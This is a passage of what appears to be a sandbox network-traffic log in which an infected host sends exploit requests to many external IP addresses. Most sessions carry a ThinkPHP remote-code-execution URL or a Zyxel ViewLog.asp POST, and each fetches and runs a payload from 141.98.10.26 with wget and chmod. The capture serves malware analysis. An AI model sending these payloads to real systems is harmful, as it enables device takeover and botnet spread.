Nov 22, 2023 08:38:43.029985905 CET	6360	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 (Ubuntu) Date: Wed, 22 Nov 2023 07:38:42 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
297	192.168.2.23	45690	95.84.187.77	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:42.845031977 CET	6354	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:43.050825119 CET	6362	IN	HTTP/1.1 400 Bad Request Server: Web server Date: Wed, 22 Nov 2023 07:38:34 GMT Content-Type: text/html Content-Length: 171 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>Web server</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
298	192.168.2.23	49592	95.59.105.79	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:42.892321110 CET	6354	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:43.146147013 CET	6362	IN	HTTP/1.1 200 OK
Nov 22, 2023 08:38:43.146330118 CET	6363	IN	Data Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www

Session ID	Source IP	Source Port	Destination IP	Destination Port
299	192.168.2.23	39706	95.31.197.19	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:42.895598888 CET	6355	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:43.151166916 CET	6363	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 22 Nov 2023 07:38:43 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
300	192.168.2.23	41622	85.234.151.119	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:43.396519899 CET	6487	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:43.572441101 CET	6497	IN	HTTP/1.1 404 Content-Type: text/html;charset=utf-8 Content-Language: en Content-Length: 1097 Date: Wed, 22 Nov 2023 07:38:43 GMT Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 68 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 62 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 70 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 61 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 4d 65 73 73 61 67 65 3c 2f 62 3e 20 26 23 34 37 3b 63 67 69 2d 62 69 6e 26 23 34 37 3b 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 70 3e 3c 70 3e 3c 62 3e 44 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 54 68 65 20 6f 72 69 67 69 6e 20 73 65 72 76 65 72 20 64 69 64 20 6e 6f 74 20 66 69 6e 64 20 61 20 63 75 72 72 65 6e 74 20 72 65 70 72 65 73 65 6e 74 61 74 69 6f 6e 20 66 6f 72 20 74 68 65 20 74 61 72 67 65 74 20 72 65 73 6f 75 72 63 65 20 6f 72 20 69 73 20 6e 6f 74 20 77 69 6c 6c 69 6e 67 20 74 6f 20 64 69 73 63 6c 6f 73 65 20 74 68 61 74 20 6f 6e 65 20 65 78 69 73 74 73 2e 3c 2f 70 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 38 2e 35 2e 33 38 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">h1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} h2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} h3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} body {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} b {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} p {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;} a {color:black;} a.name {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> /cgi-bin/ViewLog.asp</p><p><b>Description</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/8.5.38</h3></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
301	192.168.2.23	47586	31.136.72.185	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:43.396579027 CET	6488	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:43.980489969 CET	6551	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:45.132191896 CET	6667	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:47.563838959 CET	7026	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:52.171257019 CET	7553	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:01.385930061 CET	8725	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:19.815339088 CET	10957	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:56.674258947 CET	15328	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
302	192.168.2.23	43732	31.136.186.14	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:43.396714926 CET	6488	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:43.980484962 CET	6550	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:45.164187908 CET	6676	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:47.563838005 CET	7026	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:52.427320004 CET	7618	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:01.897839069 CET	8807	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:21.863143921 CET	11186	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:00.769571066 CET	15817	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
303	192.168.2.23	43274	62.82.116.109	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:43.425371885 CET	6490	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
304	192.168.2.23	56788	31.10.13.171	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:43.434850931 CET	6491	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
305	192.168.2.23	52574	94.120.175.21	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:43.435942888 CET	6491	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
306	192.168.2.23	52572	31.200.50.123	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:43.437567949 CET	6492	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
307	192.168.2.23	33538	31.200.109.246	8080

Timestamp	kBytes transferred	Direction	Data
